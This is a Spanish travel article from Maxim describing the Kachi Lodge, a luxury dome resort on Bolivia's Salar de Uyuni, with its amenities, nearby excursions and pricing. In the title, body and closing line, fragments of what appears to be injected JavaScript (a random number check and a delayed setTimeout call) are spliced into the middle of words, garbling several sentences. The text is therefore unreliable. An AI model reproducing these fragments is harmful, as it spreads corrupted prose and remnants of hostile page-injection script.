Un paraíso de resort en el Salar de Uyuni

    Un paraíso de resort en el Salar de Uyuni

    Duerme debajo de las estrellas en el interior de las cúpulas de lujo en el salar más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande del mundo.

    Autor: Redacción Maxim 21 mayo, 2019


    FOTO: Amazing Escapes

    Un nuevo y lujoso resort sudamericano ofrece a los aficionados a las estrellas el paraíso celestial definitivo.

     

    Establecido a casi 12,000 pies sobre el nivel del mar en los áridos terrenos del Salar de Uyuni de Bolivia es todo un paraíso, la salina más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de la Tierra, el Kachi Lodge alberga numerosas cúpulas similares a estaciones espaciales. Cada uno está hecho de triángulos equiláteros metálicos que proporcionan la estructura para un lienzo blanco y un panel de visualización transparente gigante.

     

     

     

    Pero este definitivamente no es su lugar para acampar al aire libre. En el interior de las unidades con calefacción por energía solar hay amenidades y una decoración digna de una habitación de hotel, que incluye un baño privado, una lujosa cama doble, una estufa central, una alfombra beige suave y, por supuesto, increíbles vistas del cielo iluminado por las estrellas por la noche y el paisaje desértico durante el día.

     

    Puedes visitar una isla cubierta de cactus a solo 30 pies del sitio antes de continuar hacia el pueblo momificado de Coquesa o aventurarse hasta el borde inferior del cráter del volcán Tunupa.

    Si el senderismo no es lo tuyo, la famosa parcela arqueológica de una ciudad precolombina está a poco más de una hora en vehículo. Alternativamente, los huéspedes pueden simplemente tomar prestada una de las bicicletas de montaña del resort y navegar por su lado en las salinas.

     

     

    Según Travel andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and Leisure, todas las comidas, bebidas, actividades y transporte al aeropuerto están incluidos en la estadía de dos noches. Precios empiezan a $ 1,980 por persona.

    Si la observación de estrellas en Sudamérica suena como algo que te gusta, visita el sitio web de Kachi Lodge para reservar tu viaje ahora.

     

     

     

     

    Temas relacionados con esta nota: , , ,

Duerme debajo de las estrellas en el interior de las cúpulas de lujo en el salar más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande del mundo.